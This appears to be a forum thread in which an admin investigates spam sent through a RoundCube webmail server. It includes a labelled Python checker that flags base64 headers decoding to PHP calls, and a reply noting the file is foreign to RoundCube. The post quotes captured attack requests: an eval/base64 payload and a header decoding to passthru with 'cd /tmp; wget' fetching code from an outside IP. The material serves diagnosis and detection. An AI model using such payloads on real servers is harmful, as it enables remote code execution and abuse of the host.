I installed 0.8.5 a few months ago to evaluate, but I don't actively use it. I have Apache httpd-2.2.3-63-el , php-5.1.6-39-el on RedHat 5.2, admittedly not the latest updates for EL which are 2.2.3-78 and .1.6-40.el5
I'm trying to track down some process that has managed to send a load of spam through my server - while I was away at a conference, of course.... I still haven't found a smoking gun, but sendmail has "apache set sender to
[email protected] using -f" and I found a few entries in Apache logs like:
POST /roundcube/bin/html2text.php
(although not nearly enough to account for all the spam logged by sendmail)
This isn't the previously patched vulnerability in user preferences - I don't have any active users, and there are no GETs in the logs, only these POSTs.
I don't have full network logging, but there's curious looking stuff that I do have, viz.
POST /roundcube/bin/html2text.php
Accept: cGFzc3RocnUoImVjaG8gLW47Iik7Cg==\r\n
Data: <b>{${EVAL(BASE64_DECODE($_SE...
POST /roundcube/bin/html2text.php
Accept: cGFzc3RocnUoImVjaG8gLW47Y2QgL3RtcDsgd2dldCAxNzQuMTIxLjczLjE2Mi9pY....
Those HTTP Accept strings are base-64 encoded versions of:
passthru("echo -n;");
passthru("echo -n;cd /tmp; wget ....
which looks decidedly suspicious.
I'm not sure if this issue is with RoundCube, or PHP, or Apache, or some config entry I broke.
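As an added example (not code from the original post or from RoundCube), a small Python checker that applies the analysis above to parsed requests: it decodes Accept headers that are valid base64 and flags any that turn into PHP code, and it flags POSTs to the html2text.php path from the post. The request dicts are a constructed sample; a real deployment would parse them from an access log written with a LogFormat that records the Accept header.

```python
import base64
import binascii
import re

# Markers whose presence in a decoded Accept header shows it carries PHP code,
# not a media type (passthru(...) is what the post's header decoded to).
PHP_CODE_MARKERS = ("passthru(", "system(", "exec(", "shell_exec(", "eval(", "base64_decode(")

# The path seen in the post; the reply notes this file does not ship with RoundCube.
SUSPECT_PATH = "/roundcube/bin/html2text.php"

BASE64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def decode_if_base64(value):
    """Return decoded text if value is valid base64 of printable ASCII, else None."""
    if not BASE64_RE.match(value) or len(value) % 4:
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    return text if text.strip().isprintable() else None


def analyze_request(req):
    """Return a list of findings for one parsed request (dict: method, path, accept)."""
    findings = []
    if req["method"] == "POST" and req["path"] == SUSPECT_PATH:
        findings.append("POST to %s (file is not part of RoundCube)" % SUSPECT_PATH)
    decoded = decode_if_base64(req.get("accept", ""))
    if decoded:
        hits = [m for m in PHP_CODE_MARKERS if m in decoded]
        if hits:
            findings.append("Accept header decodes to PHP code using %s: %r"
                            % (", ".join(hits), decoded.strip()))
    return findings


def scan(requests):
    """Return {index: findings} for every request that produced a finding."""
    results = {}
    for i, req in enumerate(requests):
        findings = analyze_request(req)
        if findings:
            results[i] = findings
    return results


# Constructed sample: the first two mirror the post, the third is a normal webmail request.
SAMPLE_REQUESTS = [
    {"method": "POST", "path": SUSPECT_PATH, "accept": "cGFzc3RocnUoImVjaG8gLW47Iik7Cg=="},
    {"method": "POST", "path": SUSPECT_PATH, "accept": "text/html"},
    {"method": "GET", "path": "/roundcube/", "accept": "text/html,application/xhtml+xml"},
]

if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_REQUESTS).items():
        for finding in findings:
            print("request %d: %s" % (idx, finding))
```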
There is a problem with the path you posted, "/roundcube/bin/html2text.php": there isn't and never has been an html2text.php file in RoundCube's bin folder. It has most likely been added by something malicious. I don't know of any vulnerability in RoundCube 0.8.x, but it does require PHP 5.2.1 or greater, so you may have opened up a hole within PHP.